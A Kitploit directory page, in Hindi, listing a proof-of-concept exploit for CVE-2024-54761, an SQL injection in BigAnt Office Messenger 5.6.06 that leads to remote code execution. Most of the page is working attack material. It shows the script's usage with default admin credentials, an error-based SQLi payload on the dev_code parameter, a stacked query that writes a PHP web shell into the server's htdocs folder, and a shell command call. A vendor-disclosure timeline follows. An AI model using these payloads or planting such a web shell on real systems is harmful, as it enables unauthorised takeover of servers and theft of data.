Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
उपकरण/GitHubGitHub/nscan9/cve-2024-54761
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

BigAnt Office Messenger 5.6.06 में SQL इंजेक्शन के माध्यम से RCE

BigAnt Messenger में SQL इंजेक्शन भेद्यता RCE भेद्यता का कारण बनती है। शोषण करने के लिए चरणों का पालन करें।

उपयोग:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

डिफ़ॉल्ट क्रेडेंशियल के लिए शोषण चलाएं।

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
शोषण

मैन्युअल शोषण

dev_code पैरामीटर के साथ उपयोग किए गए डेटाबेस संस्करण को निकालें जो SQLi के लिए उजागर है।

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

SQLI संस्करण SQL स्टैक क्वेरी का उपयोग करके लक्ष्य पर php वेबशेल अपलोड करें।

टूल डाउनलोड करें
root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

वेबशेल बनाएं 1 कमांड निष्पादन का प्रमाण:

root@kitploit:~
/shell.php?cmd=whoami

whoami कमांड dir

समयरेखा

31-10-2024: विक्रेता को ईमेल के माध्यम से भेद्यताएं प्रस्तुत कीं

31-10-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं

15-11-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं

15-11-2024: CVE का अनुरोध किया

संदर्भ

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com